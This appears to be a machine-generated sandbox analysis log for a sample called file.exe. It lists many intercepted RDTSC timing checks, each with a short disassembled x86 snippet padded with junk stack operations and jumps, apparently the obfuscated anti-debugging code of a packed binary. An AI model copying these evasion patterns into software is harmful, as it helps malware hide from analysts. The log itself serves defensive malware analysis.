Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC8AAF second address: FC8ACE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F4FE915D6B5h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC8ACE second address: FC8AD4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC8AD4 second address: FC8ADC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC8F14 second address: FC8F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnp 00007F4FE9502C6Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC9211 second address: FC9217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC960B second address: FC961D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4FE9502C5Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC961D second address: FC964B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B3h 0x00000007 jmp 00007F4FE915D6AAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4FE915D6ABh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC9E6D second address: FC9E72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC9E72 second address: FC9E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4FE915D6A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCFE49 second address: FCFE53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F4FE9502C56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCFE53 second address: FCFE83 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4FE915D6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007F4FE915D6B7h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCFE83 second address: FCFE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCFE87 second address: FCFE9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4FE915D6ADh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCFE9D second address: FCFEA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F41551 second address: F4155F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F4FE915D6A8h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4155F second address: F4156B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4FE9502C56h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4156B second address: F4156F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4156F second address: F41586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F4FE9502C5Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F41586 second address: F4159B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jbe 00007F4FE915D6A6h 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4159B second address: F4159F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4159F second address: F415A9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4FE915D6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD29D7 second address: FD29DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD5806 second address: FD586A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jmp 00007F4FE915D6ADh 0x0000000c jmp 00007F4FE915D6B8h 0x00000011 popad 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F4FE915D6B9h 0x0000001d pop ecx 0x0000001e jmp 00007F4FE915D6B7h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD586A second address: FD5870 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD5870 second address: FD5876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD5876 second address: FD587A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F556C2 second address: F556C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F556C7 second address: F556DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F4FE9502C7Eh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD52C5 second address: FD5305 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4FE915D6AEh 0x00000008 js 00007F4FE915D6BAh 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F4FE915D6B2h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push edx 0x0000001b pop edx 0x0000001c jmp 00007F4FE915D6AEh 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD5305 second address: FD530F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4FE9502C56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDA5ED second address: FDA603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE915D6B2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDA603 second address: FDA624 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F4FE9502C68h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDA624 second address: FDA62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDA772 second address: FDA777 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8C523 second address: F8C5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F4FE915D6ABh 0x0000000b pop edi 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F4FE915D6A8h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 call 00007F4FE915D6B1h 0x0000002d or di, E497h 0x00000032 pop edx 0x00000033 call 00007F4FE915D6B3h 0x00000038 mov dword ptr [ebp+122D3730h], edi 0x0000003e pop edi 0x0000003f mov ebx, dword ptr [ebp+124805DCh] 0x00000045 mov edi, esi 0x00000047 mov edi, esi 0x00000049 add eax, ebx 0x0000004b add dword ptr [ebp+122D2C3Bh], ecx 0x00000051 nop 0x00000052 push eax 0x00000053 jmp 00007F4FE915D6AEh 0x00000058 pop eax 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d pushad 0x0000005e popad 0x0000005f pop eax 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8C5AE second address: F8C5CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE9502C68h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8C5CA second address: F8C5CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDB576 second address: FDB57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE12E4 second address: FE12EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE12EA second address: FE12FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FE9502C5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE12FC second address: FE1300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE1300 second address: FE1320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4FE9502C64h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE1320 second address: FE1328 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE147B second address: FE147F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE147F second address: FE1487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE4898 second address: FE489C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE4CF9 second address: FE4D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4FE915D6A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE4D03 second address: FE4D24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4FE9502C63h 0x0000000d jns 00007F4FE9502C56h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE4D24 second address: FE4D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE4E92 second address: FE4EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE4EA0 second address: FE4EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jp 00007F4FE915D6AAh 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F4FE915D6B5h 0x00000017 jmp 00007F4FE915D6ACh 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 pop eax 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE4EDC second address: FE4EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4EA47 second address: F4EA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4EA4B second address: F4EA4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEA2ED second address: FEA2F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEA2F1 second address: FEA2F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEA2F6 second address: FEA2FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEA43C second address: FEA441 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEA441 second address: FEA454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F4FE915D6A6h 0x0000000d jg 00007F4FE915D6A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEBAEC second address: FEBAF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF07D1 second address: FF07E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF07E8 second address: FF07F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F4FE9502C56h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF07F4 second address: FF07F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEF919 second address: FEF92F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C62h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEFA7E second address: FEFA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEFBD5 second address: FEFBF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FE9502C67h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEFBF2 second address: FEFC04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F4FE915D6A6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEFC04 second address: FEFC0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF48FE second address: FF4923 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4FE915D6A6h 0x00000008 jmp 00007F4FE915D6ABh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jmp 00007F4FE915D6AEh 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFB5C9 second address: FFB5CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFBD6D second address: FFBD73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFBD73 second address: FFBD9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4FE9502C5Eh 0x00000014 jg 00007F4FE9502C56h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFBD9F second address: FFBDBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFBDBC second address: FFBDCE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F4FE9502C56h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F4FE9502C56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFC1F2 second address: FFC1F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFC1F8 second address: FFC211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE9502C63h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFCBC6 second address: FFCBD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4FE915D6A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100E07E second address: 100E085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100E085 second address: 100E08B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100E08B second address: 100E091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1013443 second address: 101347D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FE915D6B3h 0x00000009 pop edi 0x0000000a pushad 0x0000000b jmp 00007F4FE915D6B2h 0x00000010 jnc 00007F4FE915D6A6h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101347D second address: 1013481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1013481 second address: 1013485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1017BBE second address: 1017BF0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4FE9502C69h 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e jnc 00007F4FE9502C58h 0x00000014 jc 00007F4FE9502C5Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10191DB second address: 10191DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10191DF second address: 10191E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101904E second address: 1019054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1019054 second address: 101905A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F50578 second address: F505B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F4FE915D6B4h 0x0000000c push eax 0x0000000d jmp 00007F4FE915D6AFh 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 popad 0x00000016 pushad 0x00000017 jo 00007F4FE915D6AEh 0x0000001d jnl 00007F4FE915D6A6h 0x00000023 pushad 0x00000024 popad 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F505B9 second address: F505C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F505C1 second address: F505C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F505C7 second address: F505DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F4FE9502C5Ch 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102268B second address: 1022695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1022695 second address: 10226A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10226A0 second address: 10226C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FE915D6B4h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4FE915D6ACh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10226C9 second address: 10226EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C63h 0x00000007 jmp 00007F4FE9502C5Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10226EF second address: 10226F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1027D8E second address: 1027D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
